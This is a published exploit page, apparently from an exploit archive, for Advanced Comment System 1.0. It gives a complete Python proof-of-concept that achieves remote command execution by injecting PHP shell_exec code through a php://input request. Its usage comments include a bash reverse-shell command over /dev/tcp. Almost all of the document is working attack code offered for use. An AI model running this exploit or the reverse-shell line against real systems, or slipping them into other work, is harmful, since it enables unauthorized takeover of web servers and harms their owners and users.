Share
## https://sploitus.com/exploit?id=PACKETSTORM:165108
# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)  
# Date: November 30, 2021  
# Exploit Author: Nicole Daniella Murillo Mejias  
# Version: Advanced Comment System 1.0  
# Tested on: Linux  
  
#!/usr/bin/env python3  
  
# DESCRIPTION:  
# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the  
# response is filtered by the randomly generated alphanumeric string and only command output  
# is displayed.  
#  
# USAGE:  
# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted  
# If any special characters are used, they should be quoted with single quotes.  
#  
# Example:  
#  
# python3 acspoc.py uname -a  
# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'  
  
import sys  
import base64  
import requests  
import random  
  
def generate_string(size):  
str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"  
return ''.join(random.choice(str) for i in range(size))  
  
def exploit(cmd):  
  
# TODO: Change the URL to the target host  
url = 'http://127.0.0.1/advanced_comment_system/index.php'  
  
headers = {'Content-Type': 'application/x-www-form-urlencoded'}  
  
encoded_cmd = base64.b64encode(cmd)  
  
delimiter = generate_string(6).encode()  
  
body = b'ACS_path=php://input%00&cbcmd='  
body += encoded_cmd  
body += b'&<?php echo " '  
body += delimiter  
body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'  
  
try:  
result = requests.post(url=url, headers=headers, data=body)  
except KeyboardInterrupt:  
print("Keyboard interrupt detected.")  
sys.exit()  
  
if f'{delimiter.decode()}: ' in result.text:  
position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")  
  
if len(result.text[position:]) > 0:  
print(result.text[position:])  
else:  
print(f"No output from command '{cmd.decode()}'")  
print(f"Response size from target host: {len(result.text)} bytes")  
  
if __name__ == "__main__":  
exploit(' '.join(sys.argv[1:]).encode())